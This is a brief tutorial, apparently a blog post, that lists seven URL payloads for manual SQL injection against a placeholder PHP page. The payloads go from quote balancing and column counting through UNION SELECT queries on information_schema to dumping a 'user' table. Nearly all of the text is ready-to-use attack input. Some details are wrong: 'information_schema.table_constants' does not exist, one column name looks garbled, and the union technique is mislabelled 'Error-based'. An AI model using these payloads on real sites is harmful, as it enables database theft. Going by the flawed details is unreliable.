The following commands can be used to get the information from the database:

1:

http://www.xyz.com/shell.php?id=10’ — + : — +, — -, # etc are Balance Query. The main page should be back after inputting this.

2:

http://www.xyz.com/shell.php?id=10’ order by 7 — + : To check the column number, order by is used. It can be any no. of columns (Here, it’s 7). One must check by putting different numbers at a time.

3:

http://www.xyz.com/shell.php?id=-10’ union select 1,2,3,4,5,6,7 — + : To find the actual position of the database union select is used. Here it’s 3.

4: http://www.xyz.com/shell.php?id=-10’ union select 1,2,database(),4,5,6,7 — + : To find the database name.

5:

http://www.xyz.com/shell.php?id=-10’ union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.table_constants — + : To find the tables.

6:

http://www.xyz.com/shell.php?id=-10’ union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name = ‘user’ — + : To find the column name from the table ‘user’.

7:

http://www.xyz.com/shell.php?id=-10’ union select 1,2,group_concat(Kolkata),4,5,6,7 from user — + : To dump the data from the column ‘Kolkata’.

This is how Error-based SQLi is performed manually.

Thank you !

Maniesh Neupane🇳🇵